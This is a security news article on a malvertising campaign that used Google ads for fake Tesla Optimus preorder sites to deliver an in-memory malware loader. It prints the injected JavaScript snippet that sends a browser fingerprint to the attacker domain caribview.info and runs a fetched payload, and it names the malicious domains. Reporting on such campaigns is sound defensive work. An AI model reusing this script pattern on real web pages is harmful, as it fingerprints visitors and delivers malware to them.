Hackers Poison Google Paid Ads With Fake Tesla Websites to Deliver Malware

Hackers Poison Google Paid Ads With Fake Tesla Websites to Deliver Malware

Hackers Poison Google Paid Ads With Fake Tesla Websites to Deliver Malware

In recent weeks, a flurry of sponsored listings promising preorders for Tesla’s anticipated Optimus robots began appearing at the top of Google search results.

These advertisements directed unsuspecting users to counterfeit microsites mimicking Tesla’s design, purporting to accept $250 “non-refundable” deposits for early access to the robotics platform.

What seemed at first glance to be a routine phishing scam has evolved into a far more insidious operation: hackers have weaponized these fake Tesla landing pages to distribute custom malware payloads.

Google News

Internet Storm Center analysts noted that the campaign first surfaced around early August, following Tesla’s own promotional materials that reignited public interest in Optimus.

Hackers Poison Google Paid Ads With Fake Tesla Websites to Deliver Malware
Optimus Tesla preorder (Source – Internet Storm Center)

By registering domains such as offers-tesla.com and exclusive-tesla.com, the threat actors sidestepped traditional email filters and social media monitoring, relying instead on Google’s advertising platform to ensure maximum visibility.

Victims clicking through these paid ads encountered an ostensibly legitimate preorder form, unaware that behind the scenes malicious scripts were being silently injected.

Upon form submission, rather than charging the test credit card provided, the site responded with JavaScript designed to fingerprint the visitor’s browser and download a second-stage loader.

Internet Storm Center researchers identified this loader as a variant of the widely observed “SilentLoader” family, configured to fetch additional modules from the actor-controlled domain caribview.info.

Analysis of network traffic revealed HTTP POST requests delivering encrypted configuration blobs, which the loader then decrypted and executed in memory—leaving no executable on disk.

Infection Mechanism Deep Dive

The infection mechanism hinges on dynamic script injection and in-memory execution to evade detection. When the victim’s browser renders the fake Tesla page, the following snippet is dynamically appended to the checkout page:-

(function(){
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://caribview.info/tesla/api/config', true);
    xhr.onload = function(){  
        var cipher = new Uint8Array(xhr.response);
        var config = decryptConfig(cipher, key);
        executePayload(config.loaderUrl);
    };
    xhr.responseType="arraybuffer";
    xhr.send(collectBrowserFingerprint());
})();

This code leverages the browser’s native capabilities to gather system details—such as installed fonts, screen resolution, and plugin versions—then posts the fingerprint to the malicious API.

Hackers Poison Google Paid Ads With Fake Tesla Websites to Deliver Malware
Offers-tesla.com checkout page illustrating malicious script injection (Source – Internet Storm Center)

The encrypted response contains both the URL of the secondary payload and a crypto key, ensuring that signature-based defenses remain blind to the true nature of the download.

Once in memory, the loader initiates a reflective DLL injection into the victim’s browser process, granting full code execution privileges without writing to disk.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial


Source link

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.